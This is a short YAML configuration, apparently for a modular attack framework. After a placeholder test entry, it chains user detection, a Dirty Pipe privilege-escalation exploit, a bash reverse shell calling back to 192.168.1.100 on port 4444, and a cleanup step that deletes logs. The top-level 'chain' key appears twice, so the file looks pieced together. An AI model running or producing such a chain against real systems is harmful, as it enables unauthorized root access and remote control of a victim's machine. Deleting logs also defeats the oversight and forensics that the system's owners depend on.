chain:
  - module: "test_module"
    params:
      example_param: "value"
chain:
  - module: "detect_user"
    params: {}

  - module: "dirtypipe_exploit"
    params:
      lpe: true

  - module: "reverse_shell"
    params:
      lhost: "192.168.1.100"
      lport: 4444
      shell_type: "bash"

  - module: "cleanup"
    params:
      delete_logs: true
